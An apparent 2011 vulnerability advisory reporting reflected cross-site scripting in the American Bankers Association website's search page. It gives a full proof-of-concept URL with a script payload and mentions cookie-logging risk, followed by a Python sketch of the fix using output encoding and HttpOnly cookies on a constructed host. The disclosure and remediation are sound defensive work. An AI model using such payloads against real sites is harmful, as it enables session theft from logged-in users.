########################################################
| Title  : American Bankers Association (aba.com) XSS
| Author : Codeine
| Email  : f3codeine[at]yahoo[dot]com
| Site   : http://infosecforums.com/
| Date   : 08/09/2011
| Cat    : PHP[XSS]
| URL    : http://aba.com/
########################################################

American Bankers Association uses a search script provided by "xSynthesis Search". After checking, no current version by them is vulnerable. Since aba.com allows users to log in, this vulnerability presents a great security risk regarding cookie logging. This is not persistent but still provides an area of risk.

[*] XSS Vulnerability

http://www.aba.com/Search2/searchaba.aspx?xr=t&adv=t&PageSize=10&MaxPages=200&SearchKind=ExactPhrase&SearchPhrase=%3Cscript%3Ealert%28%27CodeineXSS%27%29%3B%3C%2Fscript%3E

What I used works in all of the input fields.

______________________________________________________________________________________

Greetz Hidden Ninja
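The fix for a reflected search parameter like the one above is output encoding at the point of reflection, with an HttpOnly session cookie as defence in depth against the cookie risk the advisory describes. The sketch below is an added example, not code from aba.com or xSynthesis Search; it uses Python as a stand-in for the site's server-side code, and the host, function names and cookie name are assumptions.

```python
import html
from http.cookies import SimpleCookie
from urllib.parse import parse_qs, urlsplit

# Constructed request: hypothetical host, query string shaped like the advisory's URL.
SAMPLE_URL = (
    "http://search.example/Search2/searchaba.aspx?xr=t&adv=t&SearchKind=ExactPhrase"
    "&SearchPhrase=%3Cscript%3Ealert%28%27CodeineXSS%27%29%3B%3C%2Fscript%3E"
)

def search_phrase(url):
    """Return the URL-decoded SearchPhrase parameter ('' if absent)."""
    return parse_qs(urlsplit(url).query).get("SearchPhrase", [""])[0]

def render_unsafe(phrase):
    """Weak form: the decoded parameter is concatenated straight into markup."""
    return (f'<input name="SearchPhrase" value="{phrase}">'
            f"<p>Results for: {phrase}</p>")

def render_safe(phrase):
    """Hardened form: encode for HTML text and quoted-attribute contexts."""
    encoded = html.escape(phrase, quote=True)  # also encodes " and '
    return (f'<input name="SearchPhrase" value="{encoded}">'
            f"<p>Results for: {encoded}</p>")

def session_cookie_header(session_id):
    """Defence in depth: HttpOnly keeps page script from reading the cookie."""
    cookie = SimpleCookie()
    cookie["session"] = session_id  # hypothetical cookie name
    cookie["session"]["httponly"] = True
    cookie["session"]["secure"] = True
    return cookie["session"].OutputString()

if __name__ == "__main__":
    phrase = search_phrase(SAMPLE_URL)
    print(render_unsafe(phrase))  # markup is reflected verbatim
    print(render_safe(phrase))    # markup is rendered as inert text
    print(session_cookie_header("constructed-session-id"))
```

Encoding has to happen in every place the phrase is echoed, including the `value` attribute of the search box, which is why `quote=True` matters here.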